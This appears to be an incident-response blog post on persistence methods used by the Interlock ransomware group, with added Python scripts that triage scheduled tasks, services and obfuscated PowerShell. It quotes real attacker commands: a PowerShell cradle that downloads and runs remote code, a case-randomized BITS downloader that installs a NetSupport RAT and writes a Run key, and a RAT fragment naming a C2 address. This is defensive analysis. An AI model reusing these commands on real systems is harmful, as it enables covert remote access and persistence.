Persistence Techniques: Modern threat actors are deploying large-scale and varied persistence methods across environments to add pressure to recovery efforts, slow forensic response, and increase likelihood of maintaining persistence.
Case Highlight: The Interlock ransomware group utilized over 40 unique persistence methods across more than 100 hosts, complicating complete eradication efforts.
Actionable Insights: Understanding these sophisticated tactics is vital for enhancing incident response strategies and safeguarding critical infrastructure.
Persistence has always been a core component of a threat actor’s playbook -- target a handful of hosts, install a backdoor out of plain sight to maintain access in the event of disruption, and avoid detection. For forensics operators, this leads to the proverbial "needle-in-a-haystack" approach of hunting across core assets during timeframes of interest for potential footholds. However, we're starting to see a shift in how threat actors use persistence. In a recent ransomware case involving the Interlock ransomware group, nearly 25% of the environment was impacted by 1 of 40 different variants of persistence spanning scheduled tasks, registry keys, and services. This approach can quickly overwhelm recovery teams looking to restore business operations, add pressure to forensics teams that are rapidly trying to contain the environment, and may increase the likelihood that a persistence method on a host without a forensic collection or EDR agent goes unnoticed. In this blog, we'll take a look at the different persistence methods used by Interlock, and a measured incident response approach to accelerate eradicating threats that employ this method so that clients can return to business operations more rapidly.
Threat actors establish persistence through a range of techniques, not only to maintain their foothold throughout the compromise period but, in some cases, such as with Interlock, to maintain persistence even after organizations have returned to business as usual. The majority of methods observed were through scheduled tasks and disguised malicious services, through a variety of file types and techniques.
We observed that more than half of the identified unique persistence mechanisms involved scheduled tasks. This included the use of Java-based backdoors, Node.js scripts, Cloudflare tunneling, and disguised DLL execution. A few examples of the activity observed can be seen below.
The ScheduledDefrags task was configured to use rundll32.exe to execute a malicious DLL masquerading as sccm.log, which established a command-and-control (C2) channel to a threat actor–controlled host. This technique provided persistence while evading detection by imitating the legitimate ScheduledDefrag system task.
Task Name: \Microsoft\Windows\Defrag\ScheduledDefrags
C:\Windows\System32\rundll32.exe
C:\Users\_[Redacted]-backup\AppData\Roaming\sccm.log
The legitimate Windows task \Microsoft\XblGameSave\XblGameSaveTask was modified to execute node.exe with wmstupone.txt, a Node.js script that established a C2 channel. This represents another tactic observed during the engagement to maintain persistence while evading detection.
Task Name: \Microsoft\XblGameSave\XblGameSaveTask
C:\Temp\node.exe
C:\Temp\wmstupone.txt
The task GoogleUpdaterTaskSystem... was configured to execute node.exe with googlenode.txt, a Node.js script designed to establish a C2 channel. In this case, the script was placed within a directory associated with ShoreTel’s legitimate telephony software suite, likely to evade detection by blending into a trusted application path.
Task Name: GoogleUpdaterTaskSystem132.0.6833.0{FC2A638D-CAB7-47A2-A088-CA98404027BF}
C:\Program Files (x86)\Shoreline Communications\ShoreWare Remote Server\wserver\node.exe
C:\Program Files (x86)\Shoreline Communications\ShoreWare Remote Server\wserver\googlenode.txt
The legitimate ProactiveScan task was modified to invoke a PowerShell download cradle that connected to a trycloudflare.com domain. This enabled the attacker to maintain persistence by remotely executing scripts from their controlled infrastructure.
Task Name: ProActive Scan
powershell.exe -NoProfile -w H -c "$r=iwr 'https[:]//sun-insurance-estimated-jurisdiction[.]trycloudflare[.]com' -UseBasicParsing;$s=[Text.Encoding]::UTF8.GetString($r.Content);iex $s"
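The four tasks above share traits that can be checked mechanically across every host rather than one at a time: a name that is a near-copy of a built-in task, rundll32.exe pointed at something that is not a .dll, node.exe handed a .txt file, a PowerShell one-liner that fetches and runs remote content, and binaries living under Temp or AppData. The script below is an added example, not code from MOXFIVE or from the post. It assumes the task definitions were collected as XML from C:\Windows\System32\Tasks on each host and are passed in as text; the sample definitions are constructed to mirror the tasks described above (paths and task names are taken from the post, the Cloudflare hostname is a placeholder, the profile name is redacted as in the post), and KNOWN_GOOD_NAMES is a hand-picked list, not a complete inventory of built-in tasks.

```python
"""Offline triage of scheduled-task XML definitions (added example, not MOXFIVE tooling)."""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Built-in task names the observed tasks imitated or hijacked (assumed, incomplete list).
KNOWN_GOOD_NAMES = ["ScheduledDefrag", "XblGameSaveTask", "ProactiveScan"]

# Constructed task definitions modelled on the post; the last one is a benign control.
SAMPLE_TASKS = [
    r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"><RegistrationInfo>
<URI>\Microsoft\Windows\Defrag\ScheduledDefrags</URI></RegistrationInfo><Actions><Exec>
<Command>C:\Windows\System32\rundll32.exe</Command><Arguments>C:\Users\[Redacted]-backup\AppData\Roaming\sccm.log</Arguments>
</Exec></Actions></Task>""",
    r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"><RegistrationInfo>
<URI>\Microsoft\XblGameSave\XblGameSaveTask</URI></RegistrationInfo><Actions><Exec>
<Command>C:\Temp\node.exe</Command><Arguments>C:\Temp\wmstupone.txt</Arguments></Exec></Actions></Task>""",
    r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"><RegistrationInfo>
<URI>\GoogleUpdaterTaskSystem132.0.6833.0{FC2A638D-CAB7-47A2-A088-CA98404027BF}</URI></RegistrationInfo><Actions><Exec>
<Command>C:\Program Files (x86)\Shoreline Communications\ShoreWare Remote Server\wserver\node.exe</Command>
<Arguments>C:\Program Files (x86)\Shoreline Communications\ShoreWare Remote Server\wserver\googlenode.txt</Arguments>
</Exec></Actions></Task>""",
    r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"><RegistrationInfo>
<URI>\ProActive Scan</URI></RegistrationInfo><Actions><Exec><Command>powershell.exe</Command>
<Arguments>-NoProfile -w H -c "$r=iwr 'https[:]//placeholder-tunnel[.]trycloudflare[.]com' -UseBasicParsing;$s=[Text.Encoding]::UTF8.GetString($r.Content);iex $s"</Arguments>
</Exec></Actions></Task>""",
    r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"><RegistrationInfo>
<URI>\Microsoft\Windows\Defrag\ScheduledDefrag</URI></RegistrationInfo><Actions><Exec>
<Command>%windir%\system32\defrag.exe</Command><Arguments>-c -h -k -g -$</Arguments></Exec></Actions></Task>""",
]


def parse_task(xml_text):
    """Return (task URI, [(command, arguments), ...]) from one task definition."""
    root = ET.fromstring(xml_text)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="", namespaces=NS)
    actions = []
    for ex in root.findall(".//t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS)
        args = ex.findtext("t:Arguments", default="", namespaces=NS)
        actions.append((cmd, args))
    return uri, actions


def flag_task(uri, actions):
    """Apply heuristics drawn from the observed tasks; return a list of findings."""
    findings = []
    raw = uri.rsplit("\\", 1)[-1]
    norm = raw.replace(" ", "").lower()
    for good in KNOWN_GOOD_NAMES:
        g = good.lower()
        if raw == good:
            continue  # exact built-in name: judge it by its actions instead
        if norm == g:
            findings.append(f"name differs only in spacing/case from built-in {good}")
        elif norm.startswith(g) or (g.startswith(norm) and len(norm) >= len(g) - 2):
            findings.append(f"name imitates built-in task {good}")
    for cmd, args in actions:
        cmd_l = cmd.lower()
        args_l = args.lower().replace("[.]", ".")  # undo defanging if the export was defanged
        exe = cmd_l.replace("/", "\\").rsplit("\\", 1)[-1]
        if exe == "rundll32.exe" and not re.search(r"\.dll\b", args_l):
            findings.append("rundll32 loading a file without a .dll extension")
        if exe == "node.exe" and re.search(r"\.txt\b", args_l):
            findings.append("node.exe executing a .txt script")
        if exe.startswith("powershell") and re.search(r"\b(iwr|invoke-webrequest)\b", args_l) and "iex" in args_l:
            findings.append("PowerShell download cradle")
        if "trycloudflare.com" in args_l:
            findings.append("trycloudflare.com tunnel domain")
        if re.search(r"\\(temp|appdata)\\", cmd_l + " " + args_l):
            findings.append("binary or script under Temp/AppData")
    return findings


def triage(task_xml_list):
    """Map each task URI to its findings; clean tasks map to an empty list."""
    report = {}
    for xml_text in task_xml_list:
        uri, actions = parse_task(xml_text)
        report[uri] = flag_task(uri, actions)
    return report


if __name__ == "__main__":
    for uri, findings in triage(SAMPLE_TASKS).items():
        print(uri, "->", findings or "clean")
```

Run over the real collection, the output is a per-host list to compare against a known-good baseline; the benign ScheduledDefrag definition at the end of the sample set produces no findings, which is the check that the rules do not fire on the task the attacker was imitating.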
A significant number of the identified persistence mechanisms leveraged Windows Services to execute malicious binaries upon system startup. Several examples of this activity are provided below. The Win32.dll file is a malicious DLL registered as a Windows service. Once loaded, it facilitates ongoing communication with attacker-controlled infrastructure, functioning as a persistent backdoor on the system.
"C:\Windows\system32\rundll32.exe" C:\Windows\Temp\win32.dll start
Despite its .ps1 extension, CheckFolder.ps1 is a disguised DLL, identifiable by its MZ header. Its true purpose is to maintain remote access by routinely connecting to a C2 server, enabling the attacker to issue commands and exfiltrate data under the guise of a benign PowerShell script.
"C:\Windows\system32\rundll32.exe" C:\Scripts\CheckFolder.ps1 start
Disguised as a benign deployment component, veeamDeploymentSvc.jar is a malicious Java archive set to run as a service. It was designed to covertly establish a C2 channel, granting remote control capabilities while blending in with enterprise software.
java.exe -jar C:\temp/veeamDeploymentSvc.jar
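The three service entries above are distinguishable from the command line alone (rundll32.exe acting as a service host, a rundll32 target without a .dll extension, a JAR started by java.exe, payloads under Temp or Scripts) and, where the referenced file was collected, by comparing its magic bytes with its extension, which is exactly how CheckFolder.ps1 gives itself away. The following is an added example, not MOXFIVE's tooling. It assumes the service ImagePath values were exported from each host and the referenced files were collected alongside; the three command lines are the ones quoted above, and the file contents are constructed stubs that reproduce the described headers (MZ for the disguised DLL, PK for the JAR).

```python
"""Service image-path review with an extension-versus-content check (added example)."""
import re

# Constructed file contents keyed by the path that appears in each command line.
COLLECTED_FILES = {
    r"C:\Windows\Temp\win32.dll": b"MZ\x90\x00" + b"\x00" * 60,
    r"C:\Scripts\CheckFolder.ps1": b"MZ\x90\x00" + b"\x00" * 60,  # PE despite the .ps1 name
    r"C:\temp/veeamDeploymentSvc.jar": b"PK\x03\x04" + b"\x00" * 60,
}

# The service command lines quoted in the post.
SERVICE_IMAGE_PATHS = [
    r'"C:\Windows\system32\rundll32.exe" C:\Windows\Temp\win32.dll start',
    r'"C:\Windows\system32\rundll32.exe" C:\Scripts\CheckFolder.ps1 start',
    r"java.exe -jar C:\temp/veeamDeploymentSvc.jar",
]

EXPECTED_TYPE = {"dll": "pe", "exe": "pe", "jar": "zip"}  # any other extension: text/other


def file_type(data):
    """Classify a file by its leading magic bytes only."""
    if data.startswith(b"MZ"):
        return "pe"
    if data.startswith(b"PK\x03\x04"):
        return "zip"
    return "text/other"


def split_image_path(image_path):
    """Separate the executable from its arguments, honouring a quoted executable path."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.index('"', 1)
        return s[1:end], s[end + 1:].strip()
    head, _, rest = s.partition(" ")
    return head, rest.strip()


def first_path_argument(args):
    """Return the first argument that looks like a drive-letter path, without quotes."""
    for tok in re.findall(r'"[^"]+"|\S+', args):
        tok = tok.strip('"')
        if re.match(r"[a-zA-Z]:[\\/]", tok):
            return tok
    return ""


def analyze_service(image_path, files):
    """Return the list of findings for one service command line."""
    exe, args = split_image_path(image_path)
    exe_name = exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    target = first_path_argument(args)
    target_norm = target.replace("/", "\\").lower()  # mixed separators as in C:\temp/...
    fname = target_norm.rsplit("\\", 1)[-1]
    ext = fname.rsplit(".", 1)[-1] if "." in fname else ""
    findings = []
    if exe_name == "rundll32.exe":
        findings.append("service hosted by rundll32.exe")
        if ext != "dll":
            findings.append("rundll32 loading a file without a .dll extension")
    if exe_name.startswith("java") and "-jar" in args.lower():
        findings.append("Java archive launched as a service")
    if re.search(r"\\(temp|scripts)\\", target_norm):
        findings.append("payload under a Temp or Scripts directory")
    data = files.get(target)
    if data is not None:
        actual = file_type(data)
        if EXPECTED_TYPE.get(ext, "text/other") != actual:
            findings.append(f"extension .{ext} does not match content type {actual}")
    return findings


def review_services(image_paths, files):
    return {p: analyze_service(p, files) for p in image_paths}


if __name__ == "__main__":
    for path, findings in review_services(SERVICE_IMAGE_PATHS, COLLECTED_FILES).items():
        print(path, "->", findings)
```

The extension check is deliberately strict in both directions: a .dll that is not a PE is as worth a look as a .ps1 that is, since either means the name was chosen for something other than describing the file.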
The threat actor leveraged the Registry Run key to establish persistence within the compromised environment. Specifically, the Background Intelligent Transfer Service (BITS) was employed to download malicious archive files from attacker-controlled staging domains. Upon extraction, the payload, client32.exe, a NetSupport Remote Access Tool, was added to the Registry Run key to execute at system startup.
$rkhKs='https://andrixdesign[.]com/kzz/c4ub.zip'; $r4i0aO2=gCm ExPAND-aRchive -ERroRactiOn sILENtlyCONTInUE; $tAzDM3G='0YEHK.zip'; $JxLRSsu='0neNote'; $yMIQvFY='https://andrixdesign[.]com/kzz/c1ub.zip'; [NET.seRviCEpOinTmAnageR]::SeCURiTyPRotOcoL = [NET.SecUritYpROTOCoLTyPe]::TLS12; $xV9GW='8lf8Nz.zip'; cHDir $EnV:APPdATA; $gXBHN='https://andrixdesign[.]com/kzz/c3ub.zip'; $hs0jp='8x2ORG1p.zip'; $3kyFB='tfoTTAz.zip'; $89ZOqF=GeT-cOMmand STarT-BiTstransFer -eRroRACtIOn SIlENTLYCoNtiNuE; $iZvbcU8='https://andrixdesign[.]com/kzz/c2ub.zip'; $Tdb1LJi=jOiN-pAtH -path $EnV:appdaTa -ChildPaTH $3kyFB; $fkrT24xB=join-PaTh -path $ENv:aPPdATA -CHiLDPAtH $xV9GW; $tIN8p6=$EnV:APPDAta, $hs0jp -JOIn '\'; $7LbeS=$ENv:aPPdATA, $tAzDM3G -joiN '\'; $0vJiRU=$env:ApPDAta+'\'+$JxLRSsu; $nvEF3="bitSaDmIn.Exe /tRAnsFEr cxVpi /DoWNlOaD /pRiorITY noRMal $iZvbcU8 $Tdb1LJi"; $5Hb8u="BitsaDMiN.EXe /TraNsfeR 2rb7ljAs /DownLOaD /pRIOrity NoRmAl {0} {1}" -f $yMIQvFY, $7LbeS; $mNHWh='BitsaDMiN.EXe /TraNsfeR 2rb7ljAs /DownLOaD /pRIOrity NoRmAl '+$yMIQvFY+' '+$fkrT24xB; $fmIHy="BitSADmIn.eXe /transfer XWI63 /DoWnLOaD /prIoRItY nOrMal {0} {1}" -f $gXBHN, $tIN8p6; IF ($r4i0aO2) { if ($89ZOqF) { sTArt-bITsTRAnSfEr -SOurCE $rkhKs -dEStINAtion $7LbeS; STArT-BiTStraNsFeR -SOurCE $gXBHN -DEstInatIOn $tIN8p6; StarT-biTsTrAnSFER -sOuRce $iZvbcU8 -dEsTInAtioN $Tdb1LJi; STaRt-biTStRAnSfER -souRCE $yMIQvFY -DeSTinatIon $fkrT24xB; } ELse {iNvoKE-EXprEssiON -CoMmaND $fmIHy; iNvoKE-EXprEssiON -CoMmaND $5Hb8u; iNvOkE-eXPResSIoN -coMMand $mNHWh; iNvoKE-EXprEssiON -CoMmaND $nvEF3; } eXPaND-arCHIvE -Path $fkrT24xB -dESTinATiOnpath $0vJiRU; EXpand-aRCHIVe -PAth $7LbeS -dESTInaTIOnpaTh $0vJiRU; eXPAnD-ArcHIve -PAtH $tIN8p6 -dEsTiNaTioNPAth $0vJiRU; expANd-aRChiVE -PaTH $Tdb1LJi -dEsTiNaTiONPATh $0vJiRU; rD -PaTH $7LbeS; rEMoVe-itEm -paTH $Tdb1LJi; rD -paTH $tIN8p6; rD -pATH $fkrT24xB; } elSE { $VQwHwmqE='https://andrixdesign[.]com/kzf/'; nI -path $ENv:APpdAtA -nAME $JxLRSsu -iTemTYPE 'directory'; 
$2w7SnNYX=@('client32.exe', 'pcicapi.dll', 'nskbfltr.inf', 'msvcr100.dll', 'client32.ini', 'NSM.LIC', 'AudioCapture.dll', 'HTCTL32.DLL', 'remcmdstub.exe', 'PCICHEK.DLL', 'PCICL32.DLL', 'TCCTL32.DLL', 'nsm_vpro.ini'); iF ($89ZOqF) { $2w7SnNYX | FoReACh { $I8YZ2qOA=$VQwHwmqE+$_; $0zk0LjF=$0vJiRU+'\'+$_; StARt-BiTSTrANSFer -SoUrCe $I8YZ2qOA -dESTiNAtion $0zk0LjF; };} elsE { $2w7SnNYX | FOREach-ObjECT { $I8YZ2qOA=$VQwHwmqE+$_; $0zk0LjF=$0vJiRU+'\'+$_; $PMxf4xeF='bITsADMIn.eXE /tRaNSFEr GNuSoqmn /dowNLoAD /PRIoRITy nORmAl '+$I8YZ2qOA+' '+$0zk0LjF; INVOkE-EXpREssiON -command $PMxf4xeF;}; }; }; $FKnpvj3k=geT-itEM $0vJiRU -fORce; $FKnpvj3k.atTrIBUtes='Hidden'; cd $0vJiRU; $x6h7cc=$0vJiRU, 'client32.exe' -JoiN '\'; starT client32.exe; New-iTEmPRoPerty -patH 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -nAME $JxLRSsu -vaLUE $x6h7cc -pRopeRTyTYPE 'String';
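The randomized casing in the command above is cosmetic: PowerShell cmdlet, parameter and variable names are case-insensitive, so lower-casing the script collapses the obfuscation and the staging URLs, BITS transfers and the Run-key write can be pulled out with plain pattern matching. The script below is an added example, not MOXFIVE's tooling. It resolves only single-quoted literal assignments; values built at run time (joined paths, $env: lookups) are left as the variable name for manual follow-up, which is why the Run-key value in the output stays as $x6h7cc. SAMPLE_SCRIPT is a constructed, abridged excerpt modelled on the command above, with the staging domain defanged as in the post.

```python
"""IOC extraction from case-randomized PowerShell (added example, not MOXFIVE tooling)."""
import re

# Constructed, abridged excerpt modelled on the observed command (domain defanged as in the post).
SAMPLE_SCRIPT = (
    "$rkhKs='https://andrixdesign[.]com/kzz/c4ub.zip'; $JxLRSsu='0neNote'; "
    "[NET.seRviCEpOinTmAnageR]::SeCURiTyPRotOcoL = [NET.SecUritYpROTOCoLTyPe]::TLS12; "
    "cHDir $EnV:APPdATA; "
    "$nvEF3=\"bitSaDmIn.Exe /tRAnsFEr cxVpi /DoWNlOaD /pRiorITY noRMal $rkhKs $Tdb1LJi\"; "
    "sTArt-bITsTRAnSfEr -SOurCE $rkhKs -dEStINAtion $7LbeS; "
    "nI -path $ENv:APpdAtA -nAME $JxLRSsu -iTemTYPE 'directory'; "
    "$FKnpvj3k.atTrIBUtes='Hidden'; starT client32.exe; "
    "New-iTEmPRoPerty -patH 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' "
    "-nAME $JxLRSsu -vaLUE $x6h7cc -pRopeRTyTYPE 'String';"
)


def literal_assignments(script):
    """$name='literal' assignments, keyed by lower-cased variable name (names are case-insensitive)."""
    return {k.lower(): v for k, v in re.findall(r"\$(\w+)\s*=\s*'([^']*)'", script)}


def resolve(token, assignments):
    """Replace a $variable token with its literal value if one was assigned; otherwise keep it."""
    tok = token.strip("'\"")
    if tok.startswith("$"):
        return assignments.get(tok[1:].lower(), tok)
    return tok


def extract_iocs(script):
    assigns = literal_assignments(script)
    urls = sorted(set(re.findall(r"https?://[^\s'\";]+", script)))
    downloads, run_keys, signals = [], [], []
    for stmt in (s.strip() for s in script.split(";") if s.strip()):
        low = stmt.lower()  # PowerShell is case-insensitive, so matching on lower-case is safe
        if "bitsadmin" in low and "/transfer" in low:
            m = re.search(r"/priority\s+\S+\s+(\S+)", low)  # bitsadmin ... /priority X <source> <dest>
            if m:
                downloads.append(("bitsadmin", resolve(m.group(1), assigns)))
        if "start-bitstransfer" in low:
            m = re.search(r"-source\s+(\S+)", low)
            if m:
                downloads.append(("Start-BitsTransfer", resolve(m.group(1), assigns)))
        if "new-itemproperty" in low and "\\run'" in low:
            path = re.search(r"-path\s+'([^']+)'", stmt, re.I)
            name = re.search(r"-name\s+(\S+)", stmt, re.I)
            value = re.search(r"-value\s+(\S+)", stmt, re.I)
            run_keys.append({
                "path": path.group(1) if path else "",
                "name": resolve(name.group(1), assigns) if name else "",
                "value": resolve(value.group(1), assigns) if value else "",
            })
        if ".attributes=" in low and "hidden" in low:
            signals.append("directory marked Hidden")
        m = re.match(r"(start-process|start|saps)\s+(\S+)", low)
        if m:
            signals.append(f"process started: {m.group(2)}")
    return {"urls": urls, "downloads": downloads, "run_keys": run_keys, "signals": signals}


if __name__ == "__main__":
    for key, val in extract_iocs(SAMPLE_SCRIPT).items():
        print(key, "->", val)
```

The resolved Run-key name (0neNote) and the staging URL are the items that go straight into blocking and hunting; the unresolved $x6h7cc value is the prompt to read the surrounding statements, where the post's full command shows it being assembled from the AppData path and client32.exe.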
Remote Access Trojans (RATs) were deployed via heavily obfuscated PowerShell commands, crafted to bypass detection controls and maintain access through a designated C2 server. An example of such activity is shown below:
# Initialize XOR key array
$xorec = New-Object byte[] 50
For ($i = 0; $i -ne 50; $i++) { $xorec[$i] = $i }
# Set C2 server IP and port
$ipaddress = "157.230.182.115"
$dport = 443
# Define helper function for encryption/decryption
function Encrypt-Buffer {
    param($key, [int]$keyLength, $buffer, $start, $size)
    for ($i = 0; $i -lt $size; $i++) {
        $buffer[$start + $i] = $buffer[$start + $i] -bxor $key[$i % $keyLength]
    }
}
The threat actor was observed changing passwords for 544 user accounts within the client’s environment. This activity was intended to secure long-term access, impede recovery efforts, and delay incident response by locking out legitimate users.
The mass distribution of persistence observed in this case highlights the need for a comprehensive and methodical Digital Forensics and Incident Response (DFIR) approach. The widespread deployment and diversity of the persistence and evasion strategies observed call for full endpoint visibility, comprehensive telemetry collection, continuous monitoring, and robust forensic processes. Without these capabilities, organizations risk missing deeply embedded persistence mechanisms, allowing attackers to maintain long-term access and cause further damage.
To detect and eliminate persistence at this scale, we conducted a methodical sweep of the environment using both proactive and reactive investigative techniques. This included analyzing Windows Services and registry key modifications, enumerating scheduled tasks, reviewing command histories in both Command Prompt and PowerShell, and examining Master File Table (MFT) entries to detect anomalies. We approached each persistence type systematically, identifying file types (e.g., JARs, DLLs, Node.js scripts) to drill into across the environment. Hash blocking and Indicators of Attack (IOAs) were deployed to isolate known malicious binaries, while deep dives on high-risk hosts helped surface less obvious footholds. On-Demand Scans (ODS) were used to uncover hidden artifacts, and hosts were safely rebooted under containment to trigger latent scheduled tasks.
The Interlock Group’s tactics highlight the increasing sophistication of modern threat actors, who are adapting their methods to counteract the investigative techniques employed by responders, and enhancing their ability to evade detection. As incident responders, we must move beyond traditional ways of thinking and adopt a proactive and flexible approach to detection and response. EDR telemetry plays a crucial role in investigations, providing valuable visibility into suspicious activity in real-time. When combined with scalable forensic tools, appropriate preventative controls, and analytical processes, it enables large-scale investigations to be conducted at speed with the appropriate level of risk reduction, ensuring that layered persistence mechanisms are identified and fully eradicated from compromised environments.
At MOXFIVE, we continuously analyze emerging threats and work to develop strategies that help organizations defend against these evolving attack techniques. Persistence is one of the most challenging aspects of incident response, and without proper forensic investigations and robust processes, organizations risk leaving the door open for threat actors.
Have you encountered similar persistence techniques in your investigations?
MOXFIVE provides the clarity and peace of mind needed for attack victims during the incident response process. Our platform approach enables victims of attacks to work with a Technical Advisor who provides the expertise and guidance needed in a time of crisis, and facilitates the delivery of all technical needs required, consistently and efficiently.
With experience on the front lines responding to incidents daily, MOXFIVE Technical Advisors have the unique ability to connect the dots between business, information technology, and security objectives to help you quickly identify the gaps and build a more resilient environment.